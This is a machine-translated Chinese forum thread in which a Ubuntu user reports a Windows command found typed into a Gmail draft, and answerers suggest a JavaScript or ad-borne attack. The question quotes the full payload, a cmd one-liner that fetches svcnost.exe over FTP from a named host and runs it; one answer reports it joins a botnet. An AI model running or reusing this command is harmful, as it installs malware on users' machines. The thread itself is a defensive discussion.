我家里的电脑通常都开着,但显示器是关着的。今天晚上我下班回家,发现了一个看起来像是黑客入侵的东西:在我的浏览器中,我的 Gmail 是打开的(是我打开的),但它处于撰写模式,字段中显示以下内容TO
:
md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo 你被拥有了
在我看来,这看起来像是 Windows 命令行代码,md
代码的开头与 Gmail 处于撰写模式的事实相结合,明显表明有人试图运行命令cmd
。我想我很幸运,实际上我没有在这台电脑上运行 Windows,但我有其他运行 Windows 的电脑。这是我第一次遇到这样的事情。我不是 Linux 专家,当时除了 Firefox 之外,我没有运行任何其他程序。
我绝对确定这不是我写的,也没有其他人在实际使用我的电脑。此外,我最近将我的 Google 密码(以及我所有的其他密码)更改为类似这样的密码,vMA8ogd7bv
因此我不认为有人破解了我的 Google 帐户。
刚刚发生了什么?我的电脑不是我奶奶那台运行了好几年恶意软件的旧 Windows 机器,而是最近安装的 Ubuntu 机器,那么别人怎么会在我电脑上输入密码呢?
更新:
让我来回答一些观点和问题:
- 我在奥地利的乡下。我的 WLAN 路由器运行WPA2/相移键控以及字典中没有的中等强度的密码;必须是暴力破解,并且距离这里不到 50 米;它不太可能被黑客入侵。
- 我使用的是 USB 有线键盘,因此,任何人在范围内破解它的可能性都很小。
- 当时我并没有使用电脑;它只是在我上班时在家里闲置着。它是一台安装在显示器上的上网本电脑,所以我很少关掉它。
- 这台机器才两个月大,只运行 Ubuntu,我没有使用奇怪的软件,也没有访问奇怪的网站。它主要运行 Stack Exchange、Gmail 和报纸。没有游戏。Ubuntu 设置为保持自身更新。
- 我不知道是否有任何 VNC 服务正在运行;我当然没有安装或启用过。我也没有启动过任何其他服务器。我不确定 Ubuntu 中是否默认运行任何服务?
- 我知道 Gmail 帐户活动中的所有 IP 地址。我相当肯定 Google 不是入口。
- 我发现了一个日志文件查看器,但我不知道要查找什么。帮忙?
我真正想知道的是,并且真正让我感到不安全的是:互联网上的任何人都怎么能在我的计算机上生成按键?我如何才能避免这种情况,而不必对此采取任何隐瞒措施?我不是 Linux 极客,我是一个父亲,已经和 Windows 纠缠了 20 多年,已经厌倦了。在上网的 18 多年里,我从未亲眼见过任何黑客攻击,所以这对我来说是新鲜事。
答案1
我怀疑你有什么可担心的。这很可能是一次 JavaScript 攻击,试图通过下载驱动。如果您担心这种情况发生,请开始使用无脚本和AdBlock 插件Firefox 附加组件。
即使访问值得信赖的网站也不安全,因为它们运行来自第三方广告商的恶意 JavaScript 代码。
我抓住它并在虚拟机中运行它。它安装了 mirc,这是状态日志...http://pastebin.com/Mn85akMk
这是一种自动攻击,试图让您下载 mIRC 并加入僵尸网络,然后将您变成垃圾邮件机器人...它让我的 VM 加入并连接到多个不同的远程地址,其中之一是autoemail-119.west320.com
。
在 Windows 7 中运行它时,我必须接受 UAC 提示并允许它通过防火墙访问。
其他论坛上似乎有大量关于这个确切命令的报告,甚至有人说 torrent 文件在下载完成后试图执行该命令...但我不确定这是如何可能的。
我自己没有用过这个,但它应该能够向你显示当前的网络连接,以便你可以看到你是否连接到了不正常的事物:http://netactview.sourceforge.net/download.html
答案2
我同意@jb48394它可能是一种 JavaScript 漏洞,就像当今的所有其他漏洞一样。
事实上,它试图打开一扇cmd
窗户(看@torbengb 的评论)并运行恶意命令,而不是在后台秘密下载木马,这表明它利用 Firefox 中的一些漏洞,使其可以输入按键,但不能运行代码。
这也解释了为什么这个漏洞清楚地专为 Windows 编写,也可以在 Linux 上运行:Firefox 在所有操作系统上以相同的方式运行 JavaScript (至少,它尝试这么做:))如果它是由缓冲区溢出或类似的针对 Windows 的漏洞引起的,它就会使程序崩溃。
至于 JavaScript 代码来自哪里——可能是恶意的 Google 广告(广告全天在 Gmail 中循环播放)。 它不会 是 这 第一的 时间。
答案3
我发现类似的袭击在另一台 Linux 机器上。它似乎是 Windows 的某种 FTP 命令。